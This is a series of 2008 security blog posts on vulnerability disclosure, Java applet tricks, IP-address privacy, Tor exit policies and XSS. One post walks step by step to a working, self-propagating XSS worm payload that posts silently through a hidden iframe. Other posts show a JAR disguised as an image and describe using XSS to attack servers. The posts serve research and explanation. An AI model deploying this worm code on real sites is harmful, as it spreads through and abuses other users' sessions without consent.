Disclosure Truly is Dead

According to this eWeek article, Caught in a (Real) Security Bind, RealNetworks is unable to get information on the RealPlayer 11 vulnerability currently being offered by Gleg as part of their VulnDisco pack.

In a quote attributed to Chad Dougherty of Carnegie Mellon's CERT/CC:

We'd like to see the issue get fixed. We don't get into the politics of disclosure. Our objective is to get the information flowing in a way that end users are protected.

The sense of futility reminded me of Jeremiah Grossman's article Businesses must realize that full disclosure is dead. In it, he makes the following spot on observation:

While ethics, morals, and professionalism should always be fundamental tenants of how professionals conduct themselves, it's irresponsible to design security strategies based on the assumption people will be. Business owners and software vendors have a responsibility for the data they protect and the products they sell. They must take into consideration the environment around them, understand that it's hostile, and be pragmatic in their approach. Have no expectation that anyone is going to share any vulnerability information ahead of time. Pray they will before going public, but do not depend on it and frankly, it's hopeless to demand it.

Vendors need to recognize that conducting proactive vulnerability research into their own products must be an integral part of the software development lifecycle. Find the vulnerabilities before someone else does. That has become the only way to stay ahead.

Posted by gfleischer on 2008/01/31 at 20:07 in Security

Java 1.6u4 and Some Old Hacks Revisited

Sun's Java SE 6 Update 4 was released a few weeks ago. It isn't currently showing up on java.com, but it can be downloaded directly from Sun: Java SE Downloads. Read the Java SE 6 Update 4 Release Notes.

There haven't been any specific security advisories posted by Sun, so this may have been a bug fix only release. Or, maybe they are just waiting.

In any case, I thought it would make sense to revisit some old demonstrations I posted to see if they still worked:

Both of the online demos are still available and function just as before. So, it doesn't appear there were fixes or changes in either of these two areas.

The JAR file masquerading as an image still loads as an applet:

$ unzip -l jars.jpg
Archive:  jars.jpg
warning [jars.jpg]:  25336 extra bytes at beginning or within zipfile
  (attempting to process anyway)
  Length     Date   Time    Name
 --------    ----   ----    ----
        0  11-20-07 23:06   META-INF/
       68  11-20-07 23:06   META-INF/MANIFEST.MF
     3382  11-20-07 23:06   CorruptedApplet.class
 --------                   -------
     3450                   3 files

Results from Linux using the URLConnection class and local proxy server:

[*] beginning demo
[*] Firefox detected
[*] Java is enabled
[*] LiveConnect present
[*] found Java plugin: Java(TM) Plug-in 1.6.0_04-b12 (libjavaplugin_oji.so)
[*] starting pwn
[*] requesting http://localhost.pseudo-flaw.net:80/
[*] demo completed

Results from Windows using the URLConnection class and local proxy server:

[*] beginning demo
[*] Firefox detected
[*] Java is enabled
[*] LiveConnect present
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjava11.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjava12.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjava13.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjava14.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjava32.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npoji610.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjpi160_04.dll)
[*] starting pwn
[*] requesting http://localhost.pseudo-flaw.net:80/
[*] demo completed

With the corresponding entry and arbitrary referer in the local web-server's Apache logs:

127.0.0.1 - - [30/Jan/2008:05:46:22 -0000] "GET / HTTP/1.1" 200 5258 "http://www.google.com/search?q=pwned&btnI=I%27m+Feeling+Lucky" "Mozilla/4.0 (Linux 2.6.20-16-generic) Java/1.6.0_04 Paros/3.2.13" "-"

Wonder what the next Java update will bring?

Posted by gfleischer on 2008/01/30 at 00:29 in Hacking

IP Addresses are NOT Personal Information

The debate over whether or not Internet Protocol (IP version 4) addresses are personal information continues. As reported on New York Times Blog: Europe: Your I.P. Address Is Personal. It has been since commented on at Educated Guesswork (Uh, yeah IP addresses are identifying) and Adam Shostack added it to his Adam's Law of Perversity in Computer Security.

Let's review a few quick facts about IP addresses:

  • IP addresses are not private
  • IP addresses are not anonymous
  • IP addresses do not uniquely identify a person
  • IP addresses do not uniquely identify a computer

Granted an IP address may become identifying when it is stored in conjunction with other personal information, but by itself an IP address is not personally identifying information.

And to suddenly start talking about confidentiality and protecting your IP address (as if you own it) is simply ludicrous. By their very nature IP addresses cannot be private, because they are used to route data. Playing the privacy card for IP addresses is intellectually dishonest, and it detracts from real privacy arguments. It is disheartening to see so many people hopping on the "IP address is personal" bandwagon.

To quote LMH: It's called fanboyism, and it makes you kinda stupid.

Posted by gfleischer on 2008/01/29 at 20:52 in Rants

Top Ten Web Hacks of 2007 Results

The results are in: Top Ten Web Hacks of 2007. All good stuff.

My list in no particular order:

Posted by gfleischer on 2008/01/25 at 00:27 in Hacking

Another Magic Include Shell Sighting and Other Pwnage

A couple for my own reference.

Posted by gfleischer on 2008/01/24 at 20:26 in 0wned

Diminutive XSS Worms and IFRAMEs

The Diminutive XSS Worm Replication Contest finished up two weeks ago. See Diminutive Worm Contest Wrapup for the winners (Giorgio Maone and Sirdarckcat) and the details. RSnake posted an excellent paper that looks back at the contest and what was learned that could be used to stop XSS worms. I'll have more to say about the defense aspect later.

For all of the initial controversy, post-contest coverage was lighter than I expected:

Another thing I found fascinating is that in both RSnake's paper and the commentary, XMLHttpRequest was somehow preferred over form submission simply because it was "silent". (See Creating and Combating the Ultimate XSS Worm). But as "bwb labs" rightly points outs, there are a variety of techniques to use when the form submission approach would absolutely be required (e.g., cross-domain blind-CSRF). In fact, nearly trivial modifications can be made to support silent, one-time posting using forms. The approach is based on remote scripting with iframes (a popular technique from the pre-AJAX era).

To start with, we'll examine a contest entry from Gareth Heyes:

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">

The entry used a side-effect of the contest rules to reduce the number of bytes, so removing that will help show what is happening. It will no longer be diminutive, but the purpose here is to understand the behavior and not to create small worms.

Re-arranging the code, adding line breaks and removing the minimal payload:

<form method="post" action="post.php">
<input name="content">
<iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit();">

Obviously, the revised code will no longer self-propagate, because the method and action from the form are not being reproduced. To address this, an additional parent level element should be added. The favored solution from the contest was to use the a b and the bold function, but empirical testing indicates that a div element seems to be more effective. Additionally, making the content type hidden and explicitly closing the form and iframe tag yield better results:

<div>
<form method="post" action="post.php">
<input name="content" type="hidden">
<iframe
	onload="(f=parentNode)[0].value='<div>'+f.parentNode.innerHTML;f.submit();">
</iframe>
</form>

Here is where some of the remote scripting techniques can be applied. By assigning a target to the form and a corresponding name to the iframe, the form can be made to submit to the iframe instead of the current window. So, we add a name to the iframe and target to the form (plus a form name for good measure):

<div>
<form method="post" action="post.php" name="_f" target="_t">
<input name="content" type="hidden">
<iframe
	name="_t"
	onload="(f=parentNode)[0].value='<div>'+f.parentNode.innerHTML;f.submit();">
</iframe>
</form>

This change will cause the form to submit into the iframe and leave the current page content unchanged. But an interesting problem is encountered if the content that has been submitted is echoed back. If this happens, an infinite loop has been constructed and the repeated posts will cause undue stress on the server.

To resolve this, the submitted content should check where it is running. One piece of information that the iframe has is the window.name value, which corresponds to the name on the iframe. By adding a check for the current window name, the code can determine whether it has already been submitted or not:

<div>
<form method="post" action="post.php" name="_f" target="_t">
<input name="content" type="hidden">
<iframe
	name="_t"
	onload="if ('_t' != window.name) {
	(f=parentNode)[0].value='<div>'+f.parentNode.innerHTML;
	f.submit();
	}">
</iframe>
</form>

Unfortunately, this code suffers from a related problem. When the form submits into the iframe, the onload function will be triggered. This will happen repeatedly until the current page location is changed. To account for this a guard variable is added:

<div>
<form method="post" action="post.php" name="_f" target="_t">
<input name="content" type="hidden">
<iframe
	name="_t"
	onload="if ('undefined' == typeof(_o) ^ '_t' == window.name) {
	(f=parentNode)[0].value='<div>'+f.parentNode.innerHTML;
	f.submit();
	_o = 1;
	}">
</iframe>
</form>

The strange xor usage is done to avoid any '&' characters that may have additional encoding applied when innerHTML is used.

Finally, a CSS style is applied to hide the form and iframe. There are many ways to do this including "display: none" or "overflow: hidden" with zero height and width, but I prefer to use absolute positioning with large negative offsets. This style is applied to the form, so valid content can be included prior to it:

<div>
<i>Valid content goes <u>here</u></i>.
<form method="post" action="post.php" name="_f" target="_t"
      style="position: absolute; left: -9999px;">
<input name="content" type="hidden">
<iframe
	name="_t"
	onload="if ('undefined' == typeof(_o) ^ '_t' == window.name) {
	(f=parentNode)[0].value='<div>'+f.parentNode.innerHTML;
	f.submit();
	_o = 1;
	}">
</iframe>
</form>

Of course, a similar approach could be used to modify any of the entries that use img elements and onerror to trigger the form submission. An iframe would be added, assigned a name, and this would be the set as the target on the form.

Hopefully, it is clear that form submission worms are still a threat that should be considered even though XMLHttpRequest may be the preferred approach. But if cross-domain submission is used as a protection mechanism, clever use of the IFRAME element can still make XSS worms a possibility.

If you are having a hard time visualizing how the propagation actually works, I've posted the code to my poorly crafted PHP application. It matches the constraints in the contest while supporting multiple users with minimal fuss: xss-worm-test-0.01.tar.gz (sig). You will need PHP and MySQL. See the README for more information. I would put this online myself, but it has obvious security holes; I would strongly recommend against putting this on a publicly accessible site.

Posted by gfleischer on 2008/01/24 at 19:54 in Hacking

Jeff Jones, Manufactured Controversy, and Yes, the SDL Works

Jeff Jones has recently released a new paper comparing vulnerability counts for Windows Vista in the first year with the equivalent time frame for Windows XP. The results are that the Vista had fewer vulnerabilities in the first year than Windows XP did. Somehow that is not surprising given that XP was released prior to implementation of the Security Development Lifecyle (SDL).

In fact, if the vulnerability counts in Vista weren't significantly less, the SDL would have been declared an abysmal failure and the Microsoft security employees would have slinked off meekly into the night. But this didn't happen and that is a good thing. It lends credence to the idea that well structured security software engineering and development processes work in reducing the total number of vulnerabilities.

Of course, after Jones' previous stinker of a paper (which I discussed here), there was bound to be controversy. You can watch the piling on in the usual places (ZDNet or Slashdot). There are the usual arguments about counts, methodologies and rhyming apple with orange. Trolling and flamebait at its finest. Fanbois and zealots arise.

But all of this serves to cloud the real issue. The comparisons between Windows, the Linux versions and Mac OS X aren't getting to the core of the problem. They are simply a distraction. Most people don't stand there pondering which operating system to buy, because it may be more secure. The choice of operating system has already been made for them. For most people, it is going to be some OEM version of Windows.

So maybe a more appropriate question to pose is, if one has to purchase a computer to run Windows, should it be Windows XP SP2 or Vista? That is where the Jones paper fails to reach its full potential. Comparing an outdated, unsupported Windows XP release with Vista and at the same time comparing Vista with Linux and Mac OS X just confuses the issue of assigning some sort of "best security" mantle.

There is significant value to be found in Jones' paper if it is read dispassionately. He has promised a more interesting work that includes the Days-of-Risk (DoR) metric for the products. Personally, I am looking forward to it, because it should help clarify how much exposure an individual user had to a given vulnerability. Unfixed vulnerabilities (not undiscovered vulnerabilities) are the basis for most risk faced by users.

I hope the DoR metrics are enlightening, because a careful reading of the side-by-side comparisons showed that Ubuntu LTS (reduced) had the fewest number of unfixed vulnerabilities in the first year. I find that to be an intriguing discrepancy among the other conclusions of Windows Vista security superiority.

Posted by gfleischer on 2008/01/24 at 13:50 in Security

Self-Referencing Content - When HTML Becomes Script

From the parlor tricks department:

/* <script src="#"></script> */
alert("It Works");

If this is parsed in an HTML context, the script tag will re-include the content and cause it to be interpreted as script. The only catch is that the HTML needs to also parse as valid JavaScript.

Try it out.

Interesting, but most likely useless. Anywhere that one could inject this, one could also probably inject arbitrary script.

Tested successfully with Mozilla Firefox, Safari, Opera and Internet Explorer 6 and 7. Opera has a weird quirk of only executing it once; later invocations treat the file as script and display the contents instead of executing. Forcing a refresh of the page causes it to be re-interpreted as HTML though.

And I could swear that I had seen this before, but I can't find any references on the web searching through Google. I'm probably not hitting on the correct keywords. If anybody knows where else this is referenced, send me a link and I'll include it.

Posted by gfleischer on 2008/01/23 at 11:52 in Quirks

XSS Vulnerabilities Can Be Used to Hack Servers

Recently there has been some controversy surrounding ScanAlert's HackerSafe program with respect to its position on sites with XSS (cross-site scripting). This Information Week article gives the background. Essentially, ScanAlert believes that XSS vulnerabilities are only a threat to clients and/or their web browser.

In the article, the following statement is made:

Pierini maintains that XSS vulnerabilities aren't material to a site's certification. "Cross-site scripting can't be used to hack a server," he said. "You may be able to do other things with it. You may be able to do things that affect the end-user or the client. But the customer data protected with the server, in the database, isn't going to be compromised by a cross-site scripting attack, not directly."

Claiming that XSS can't be used to hack a server is just a semantic distinction. Of course, ScanAlert has to take that position otherwise they would appear to selling snake-oil site protection. I'm not passing any judgement on ScanAlert's mindset, but I would like to point out the XSS can be used to hack servers.

Any web-browser based attack that could be launched by an attacker could be re-packaged as a XSS scripting payload. Here are a few possible examples of using XSS to attack a server:

  • Brute-force login credentials
  • Server port-scanning
  • Data retrieval through SQL injection (SQLI)

When a user visits the site, the XSS script payload would be launched and run in the context of the original site. Obviously, the same origin protections allow the user's browser to connect back to the site, communicate with it via XMLHttpRequest, and potentially establish Java network sockets using LiveConnect. Clearly, these are all attacks against the server.

An attacker could remain extremely stealthy while conducting reconnaissance or attacking the server. By using many individual client web browsers as attack agents, the attacker never needs to connect to the site directly. With the addition of a third-party command and control site to coordinate across many clients, a user's web browser could be used to scan a single port on the server, attempt to login with a few user-names or passwords, or retrieve a single row from the database using SQLI.

The reconnaissance or attack may go completely unnoticed, because by distributing the activity across a wide number of clients, it has been spread out both in time and space. It would appear as a bunch of little, organic attacks not as a big, coordinated one. Heuristic based IDS, IPS or DLP protections may never fire if the attack is subtle enough.

These aren't any new ideas (see "10 Quick Facts..." in this paper). Really these are the same old XSS attacks against LAN clients, but targeting the originating server instead. Just something to keep in mind when someone claims XSS can't be used to hack a server.

And for more excellent commentary see Jeremiah Grossman's comments as well as Jericho's (from attrition.org).

Posted by gfleischer on 2008/01/21 at 22:39 in Security

Tor 0.1.2.19 Released

Tor (The Onion Router) version 0.1.2.19 has been released. Download it here.

The release notes make mention of one security fix:

Exit policies now reject connections that are addressed to a relay's public (external) IP address too, unless ExitPolicyRejectPrivate is turned off. We do this because too many relays are running nearby to services that trust them based on network address.

The fix addresses an issue most recently discussed on the or-talk mailing list. Martin Fink posted a message Security concerns/help me understand tor that raised the issue of cheap home routers that provide access control based on LAN IP address ranges. The basic premise is that if a Tor exit node is NAT'd behind a cheap home router, any ports listening on the LAN side of the router may be exposed to Tor traffic. This situation arises for a couple of reasons.

The first reason is due to nature of Internet routing. In a typical home network, packets destined for the external IP address of the gateway router that originate within the home network will be routed directly to the gateway router. These packets will arrive on the LAN interface even though they are addressed to the external IP address. If the router is performing authorization based on either packet source address or the interface the packet arrived on, it will appear as if this is legitimate LAN traffic. This holds true of any proxy-type systems that are deployed on an internal network but accept traffic from an external source.

The second reason is that Tor attempts to solve the exit node eavesdropper problem by detecting if you going to IP address that also has a Tor exit node running on it. If it detects this situation, Tor will construct a routing path that terminates at that IP address. The OnionRouterFAQ has an entry that describes this:

Tor does provide a partial solution in a very specific situation, though. When you make a connection to a destination that also runs a Tor relay, Tor will automatically extend your circuit so you exit from that circuit. So for example if Indymedia ran a Tor relay on the same IP address as their website, people using Tor to get to the Indymedia website would automatically exit from their Tor relay, thus getting *better* encryption and authentication properties than just browsing there the normal way.

But, that behavior combined with a NAT'd Tor server behind a cheap home router raises an interesting problem.

For example, consider home network router with an external IP address of 77.77.77.77 and an internal IP address of 192.168.0.1, and a Tor server NAT'd at 192.168.0.69. If Tor detects that a web user wants to visit the web page at IP address 77.77.77.77, the onion routing path will be constructed to exit at that IP address. When the Tor server running on 192.168.0.69 receives a packet to be routed to 77.77.77.77, it will treat it just like any other packet to exit. The server will unencrypt it and forward it out. But since the Tor server is NAT'd to 192.168.0.69, when the packet is forwarded to the gateway router, it will be receiving it on the LAN interface. If that LAN interface has a web server listening on it, that web server will respond. What if this is the administrative interface for the router and access restrictions are based on the origin of the packet? Any Tor user (that wanted to) could browser to the admin interface of the router and reconfigure it.

In general, Tor attempts to guard against routers sending locally addressed packets by automatically adding exit policy deny rules for the RFC 1918 address space. The 0.1.2.19 update adds a deny rule to the exit policy for the external IP address of the Tor server. If the old behavior is desired, it would need to be configured manually.

The change is important for those home users who don't understand the intricacies of network routing or use cheap gear that trusts packets based on where they originate. But given the relative prevalence of client-side browser exploits, that trust is probably misplaced to begin with.

Posted by gfleischer on 2008/01/19 at 20:33 in Tor


Subscribe
RSS 2.0
Quick Links
Content
Info

Categories
Archives
Sitemap
Valid XHTML 1.0 Transitional Valid CSS!